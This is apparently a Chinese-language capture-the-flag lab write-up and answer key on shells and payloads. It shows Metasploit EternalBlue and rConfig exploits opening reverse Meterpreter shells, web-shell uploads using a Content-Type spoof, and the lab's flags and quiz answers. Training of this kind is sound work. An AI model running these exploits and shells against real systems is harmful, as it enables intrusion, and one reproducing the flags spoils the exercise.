Shells和Payloads
Shell的基礎知識
正向Shells
Tom可以在一個Linux目標上發出nc -lvnp 443的命令。他需要從他的攻擊機連接到哪個端口,才能成功建立一個shell會話?
443
SSH到目標,創建一個bind shell,然后用netcat連接到目標,使用你設置的bind shell。當你完成練習后,提交位于/customscripts的flag.txt文件的內容。
B1nD_Shells_r_cool
反向Shells
當與一個目標建立反彈shell會話時,目標將作為客戶端還是服務端?
客戶端
通過RDP連接到目標機,并與你的攻擊機建立一個反彈shell會話,然后提交C:/flag.txt的內容。
NextCyber{dYPosIkA-1jA761}
Windows Shells
滲透 Windows 系統
操作系統掃描檢測
nmap -sV -sC -p- 10.18.251.236
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 17:11 CST
Nmap scan report for 10.18.251.236
Host is up (0.044s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7600 microsoft-ds
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7600 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::-
| Computer name: ecs-87246ef3-de5f-46ef-89ef-017e87c55782
| NetBIOS computer name: ECS-87246EF3-DE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-08-16T09:13:18-07:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: ECS-87246EF3-DE, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:66:4f:40 (unknown)
|_clock-skew: mean: 9h20m00s, deviation: 4h02m29s, median: 6h59m59s
| smb2-time:
| date: 2025-08-16T16:13:18
|_ start_date: 2025-08-16T16:11:12Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.52 seconds該主機運行的是 Windows Server 2008 R2 Standard 7600。
MS17-010(EternalBlue)漏洞會影響 Windows 2008 到 Server 2016 的主機。目標主機很可能有這個漏洞。我們可以用 Metasploit 的輔助模塊 auxiliary/scanner/smb/smb_ms17_010 來確認。
打開 msfconsole,用下面的會話字符串檢查。用目標的 IP 設置 RHOSTS 字段,然后開始掃描
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > optionsModule options (auxiliary/scanner/smb/smb_ms17_010):Name Current Setting Required Description---- --------------- -------- -----------CHECK_ARCH true no Check for architecture on vulnerable hostsCHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hostsCHECK_PIPE false no Check for named pipe on vulnerable hostsNAMED_PIPES /usr/share/metasploit-framew yes List of named pipes to checkork/data/wordlists/named_pipes.txtRHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 445 yes The SMB service port (TCP)SMBDomain . no The Windows domain to use for authenticationSMBPass no The password for the specified usernameSMBUser no The username to authenticate asTHREADS 1 yes The number of concurrent threads (max one per host)View the full module info with the info, or info -d command.msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.18.251.236
RHOSTS => 10.18.251.236
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.18.251.236:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.16/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 10.18.251.236:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed從掃描結果看,目標主機很可能有 EternalBlue 漏洞。現在我們來設置漏洞利用模塊和 payload,準備攻擊
配置漏洞利用模塊和 payload
這里首先嘗試使用文檔推薦的psexec 模塊沒成功,使用的是ms17_010_eternalblue模塊成功了,文檔推薦的psexec 版模塊依賴命名管道,穩定性較差
這里我們需要設置 RHOSTS 字段。其他選項可以接受默認設置。
use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 10.18.251.236
RHOST => 10.18.251.236
msf6 exploit(windows/smb/ms17_010_eternalblue) > optionsModule options (exploit/windows/smb/ms17_010_eternalblue):Name Current Setting Required Description---- --------------- -------- -----------RHOSTS 10.18.251.236 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 445 yes The target port (TCP)SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.SMBPass no (Optional) The password for the specified usernameSMBUser no (Optional) The username to authenticate asVERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows EmbeddedStandard 7 target machines.VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7target machines.Payload options (windows/x64/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 10.132.0.193 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Automatic TargetView the full module info with the info, or info -d command.msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.132.0.193:4444
[*] 10.18.251.236:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.18.251.236:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 10.18.251.236:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.18.251.236:445 - The target is vulnerable.
[*] 10.18.251.236:445 - Connecting to target for exploitation.
[+] 10.18.251.236:445 - Connection established for exploitation.
[+] 10.18.251.236:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.18.251.236:445 - CORE raw buffer dump (36 bytes)
[*] 10.18.251.236:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.18.251.236:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 10.18.251.236:445 - 0x00000020 37 36 30 30 7600
[+] 10.18.251.236:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.18.251.236:445 - Trying exploit with 12 Groom Allocations.
[*] 10.18.251.236:445 - Sending all but last fragment of exploit packet
[*] 10.18.251.236:445 - Starting non-paged pool grooming
[+] 10.18.251.236:445 - Sending SMBv2 buffers
[+] 10.18.251.236:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.18.251.236:445 - Sending final SMBv2 buffers.
[*] 10.18.251.236:445 - Sending last fragment of exploit packet!
[*] 10.18.251.236:445 - Receiving response from exploit packet
[+] 10.18.251.236:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.18.251.236:445 - Sending egg to corrupted connection.
[*] 10.18.251.236:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 10.18.251.236
[+] 10.18.251.236:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.18.251.236:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.18.251.236:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (10.132.0.193:4444 -> 10.18.251.236:49165) at 2025-08-16 17:32:06 +0800meterpreter >
成功!我們成功利用漏洞拿到了一個 shell 會話
基于文本的DOS腳本用于從命令行執行任務的文件類型是什么?(以文件擴展名回答,例如’.xxx’)
.bat
Shadow Brokers 泄漏了哪些 Windows 漏洞?(格式:MS公告編號,例如 MSxx-xxx)
MS17-010
在易受攻擊的目標上獲得shell后,提交C:\目錄下flag.txt文件的內容
NextCyber{KtJgi4GA-1lbx9y}
NIX Shells
滲透 Unix/Linux 系統
枚舉主機
└─$ nmap -sV -sC -p- 10.22.208.194
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 18:10 CST
Nmap scan report for 10.22.208.194
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Unix) PHP7/7.2.19)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.39 (Unix) PHP7/7.2.19
19100/tcp open http Golang net/http server
|_http-title: Site doesn't have a title (text/plain; version=0.0.4; charset=utf-8).
|_http-trane-info: Problem with XML parsing of /evox/about
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Sat, 16 Aug 2025 10:10:40 GMT
| HELP cadvisor_version_info A metric with a constant '1' value labeled by kernel version, OS version, docker version, cadvisor version & cadvisor revision.
| TYPE cadvisor_version_info gauge
| cadvisor_version_info{cadvisorRevision="",cadvisorVersion="",dockerVersion="Unknown",kernelVersion="4.18.0-147.5.2.14.h1051.eulerosv2r10.x86_64",osVersion="EulerOS 2.0 (SP9x86_64)"} 1
| HELP container_blkio_device_usage_total Blkio Device bytes usage
| TYPE container_blkio_device_usage_total counter
|_ container_blkio_device_usage_total{container="POD",device="/dev/vda",id="/kubepods/poda7e59e06-936e-
從輸出中可以看到系統正在監聽 80 端口(HTTP) , web 技術棧的版本號為Apache/2.4.39 (Unix) PHP7/7.2.19,以及系統運行的 Linux 發行版(Unix)
托管 web 應用為rconfig,版本為3.9.0
:
msf6 > search rconfigMatching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/multi/http/solr_velocity_rce 2019-10-29 excellent Yes Apache Solr Remote Code Execution via Velocity Template1 \_ target: Java (in-memory) . . . .2 \_ target: Unix (in-memory) . . . .3 \_ target: Linux (dropper) . . . .4 \_ target: x86/x64 Windows PowerShell . . . .5 \_ target: x86/x64 Windows CmdStager . . . .6 \_ target: Windows Exec . . . .7 auxiliary/gather/nuuo_cms_file_download 2018-10-11 normal No Nuuo Central Management Server Authenticated Arbitrary File Download8 exploit/linux/http/rconfig_ajaxarchivefiles_rce 2020-03-11 good Yes Rconfig 3.x Chained Remote Code Execution9 exploit/linux/http/rconfig_vendors_auth_file_upload_rce 2021-03-17 excellent Yes rConfig Vendors Auth File Upload RCE10 exploit/unix/webapp/rconfig_install_cmd_exec 2019-10-28 excellent Yes rConfig install Command Execution11 \_ target: Automatic (Unix In-Memory) . . . .12 \_ target: Automatic (Linux Dropper) . . . .Interact with a module by name or index. For example info 12, use 12 or use exploit/unix/webapp/rconfig_install_cmd_exec
After interacting with a module you can manually set a TARGET with set TARGET 'Automatic (Linux Dropper)'msf6 > use 9
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
因為靶機只開放了80端口,所以需要設置RHOSTS、RHOSTS和RHOSTS
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set RHOSTS 10.22.208.194
RHOSTS => 10.22.208.194
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set RHOSTS 80
RPORT => 80
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set RHOSTS false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > optionsModule options (exploit/linux/http/rconfig_vendors_auth_file_upload_rce):Name Current Setting Required Description---- --------------- -------- -----------PASSWORD admin yes Password of the admin accountProxies no A proxy chain of format type:host:port[,type:host:port][...]RHOSTS 10.22.208.194 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 80 yes The target port (TCP)SSL false no Negotiate SSL/TLS for outgoing connectionsSSLCert no Path to a custom SSL certificate (default is randomly generated)TARGETURI / yes The base path of the rConfig serverURIPATH no The URI to use for this exploit (default is random)USERNAME admin yes Username of the admin accountVHOST no HTTP server virtual hostWhen CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be anaddress on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT 8080 yes The local port to listen on.Payload options (php/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------LHOST 10.132.0.193 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 rConfig <= 3.9.6View the full module info with the info, or info -d command.msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > run
[*] Started reverse TCP handler on 10.132.0.193:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] 3.9.0 of rConfig found !
[+] The target appears to be vulnerable. Vulnerable version of rConfig found !
[+] We successfully logged in !
[*] Uploading file 'upnpimtgk.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (40004 bytes) to 10.22.208.194
[+] Deleted upnpimtgk.php
[*] Meterpreter session 1 opened (10.132.0.193:4444 -> 10.22.208.194:33608) at 2025-08-16 18:27:04 +0800meterpreter > shell
查找主機名
meterpreter > shell
Process 668 created.
Channel 0 created.
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(proc)
whoami
root
ls
Thumbs.db
ajax-loader.gif
cisco.jpg
juniper.jpg
cd /
ls
bin
boot
dev
devicedetails
etc
home
lib
lib64
libx32
media
mnt
opt
proc
root
run
sbin
selinux
srv
sys
tmp
usr
var
cd devicedetails
ls
edgerouter-isp.yml
hostnameinfo.txt
cat hostnameinfo.txt
Note:All yaml (.yml) files should be named after the hostname of the router or switch they will configure. We discussed this in our meeting back in January. Ask Bob about it.c
文件 hostnameinfo.txt 并沒有直接寫出主機名,但它包含一條重要提示:所有 YAML (.yml) 文件的名稱應與它們將要配置的路由器或交換機的主機名一致,目標路由器主機名也就是edgerouter-isp
執行rconfig_vendors_auth_file_upload_rce時,上傳的payload是用什么語言編寫的?
php
利用目標,在文件系統根部的devicedetails目錄下找到路由器的主機名。
edgerouter-isp
Web Shells
Laudanum webshell集合
用瀏覽器打開靶機IP,看到歡迎界面,按F12查看網頁源碼,發現提示/Upload.aspx
:
搜索your-ip/Upload.aspx,發現上傳文件界面
:
按照文檔所說制作webshell,
cp /usr/share/webshells/laudanum/aspx/shell.aspx /home/kali/demo.aspx
對demo.aspx進行修改,添加為你kali的IP(攻擊機的ip),或者注釋IP檢查邏輯,訪問shell時不檢查ip,這樣后面訪問時就可以不用修改xff,可以直接訪問shell文件
但是通過設置憑證,可以提高操作的安全性,確保不會有人隨意闖入使用這個 Shell。
└─$ vim demo.aspx
:
或
然后選擇你的Shell文件并點擊上傳。成功,它打印出文件保存的路徑
然后點擊上傳路徑訪問webshell(我這里直接點擊文件路徑訪問不行,需要使用火狐插件hackbar修改xff,xff修改為攻擊機ip或者webshell文件包含的其他ip,后面輸入命令同樣需要修改xff)
:
然后利用上傳的Laudanum Shell來向主機發出命令(直接輸入命令提交同樣不行,提交時也會檢查xff,所以通過hackbar的post提交命令)
:
查看路徑成功為c:\windows\system32\inetsrv
使用本節所涉及的概念與目標建立一個Web shell會話。提交你所處目錄的完整路徑作為答案。
c:\windows\system32\inetsrv
Antak Web Shell
瀏覽器訪問靶機ip,按F12查看網頁源碼,發現提示/Upload.aspx,訪問ip/Upload.aspx,發現文件上傳界面,上傳Antak Web Shell
:
文檔所說的腳本,如果沒有,訪問可以這里,獲取腳本
nishang/Antak-WebShell/antak.aspx at master · samratashok/nishang · GitHub
修改 Shell 以供使用,這里的默認登錄憑證為Disclaimer:ForLegitUseOnly,也可以修改自己想要的賬號密碼
:
訪問上傳文件所在地址,登錄webshell
:
PS> whoami
iis apppool\defaultapppoolPS> dir C:\ -Recurse -Filter flag.txt -ErrorAction SilentlyContinueDirectory: C:\Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/17/2025 7:53 AM 29 flag.txt PS> type C:\flag.txt
NextCyber{Ox6NwLjH-1krk9w}
使用本節所涉及的概念在目標機上建立一個Web shell。提交目標機上的用戶名稱,這些命令是以該用戶身份發出的。為了得到正確的答案,你必須使用vHost名稱導航到你上傳的web shell。(格式:**,1個空格)
iis apppool\defaultapppool
獲取靶機中flag的內容
NextCyber{Ox6NwLjH-1krk9w}
PHP web shell
瀏覽器訪問靶機ip,使用默認憑據(admin:admin)登錄 rConfig,然后導航到 Devices > Vendors 并點擊 Add Vendor。
使用 WhiteWinterWolf’s PHP Web Shell。我們可以下載這個 Web Shell 或者直接將其源代碼復制粘貼到一個 .php 文件中。
繞過文件類型限制,使用Burp上傳PHP web shell了。點擊瀏覽按鈕,導航到我們攻擊設備上存儲的.php文件位置,選擇打開并點擊save
:
我們將Content-type從application/x-php更改為image/gif。這將“欺騙”服務器,使我們能夠上傳.php文件,從而繞過文件類型限制。完成此操作后,我們可以選擇Forward兩次,文件將會被提交。現在我們可以關閉Burp攔截器,回到瀏覽器查看結果。
:
消息提示:‘Added new vendor NetVen to Database’告訴我們文件上傳成功了。
使用瀏覽器訪問webshell,ip:/images/vendor/upload.php
ls /images/vendor/*gif
:
在所示示例中,必須將 Content-Type 更改為什么才能成功上傳 Web shell?(格式: …/… )
image/gif
利用你從本節中學到的知識,獲取web shell。目標上的/images/vendor目錄下的gif文件名稱是什么?(格式:****.gif)
ajax-loader.gif
)
TDD系統:光收發端編解碼與信號處理分析與方案(數字版))
B860AV2.1-A2和CM311-5-zg刷機手記)
】項目管理下:軟件質量與配置管理:構建可靠軟件的基礎保障)
)
)
